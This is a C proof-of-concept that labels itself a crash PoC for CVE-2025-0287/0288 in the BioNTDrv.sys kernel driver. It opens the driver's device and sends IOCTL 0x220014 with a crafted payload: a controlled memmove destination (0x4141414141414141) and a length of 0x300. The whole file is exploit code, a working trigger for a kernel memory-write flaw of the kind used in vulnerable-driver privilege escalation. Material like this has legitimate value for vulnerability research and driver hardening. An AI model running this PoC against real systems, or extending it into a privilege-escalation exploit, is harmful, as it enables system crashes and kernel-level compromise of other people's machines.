1#include <windows.h>
 2#include <stdio.h>
 3#include <stdint.h>
 4
 5#pragma pack(push, 1)
 6typedef struct _IOCTL_PAYLOAD {
 7    uint32_t field0;   // maps to *(DWORD*)&v7->Type
 8    uint32_t length;   // maps to *(DWORD*)(&v7->Size + 1)
 9    uint64_t dst;      // maps to v7->MdlAddress (used as memmove dst)
10} IOCTL_PAYLOAD;
11#pragma pack(pop)
12
13int wmain(void)
14{
15    IOCTL_PAYLOAD payload;
16    DWORD bytesReturned = 0;
17    BOOL ok;
18
19    printf("[*] BioNTDrv.sys CVE-2025-0287 / 0288 crash PoC\n");
20
21    HANDLE hDev = CreateFileW(L"\\\\.\\BioNTDrv", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
22    if (hDev == INVALID_HANDLE_VALUE) {
23        wprintf(L"CreateFileW failed: %lu\n", GetLastError());
24        return 1;
25    }
26
27
28    ZeroMemory(&payload, sizeof(payload));
29
30    payload.field0 = 0x0;
31    payload.length = 0x300;
32    payload.dst = 0x4141414141414141ULL;
33 
34    printf("[*] Sending IOCTL 0x220014\n");
35    printf("    dst    = 0x%llx\n", payload.dst);
36    printf("    length = 0x%x\n", payload.length);
37
38    ok = DeviceIoControl(hDev, 0x220014, &payload, sizeof(payload), NULL, 0, &bytesReturned, NULL);
39
40    printf("[!] DeviceIoControl returned: %d (GetLastError=%lu)\n",
41        ok, GetLastError());
42
43    CloseHandle(hDev);
44    return 0;
45}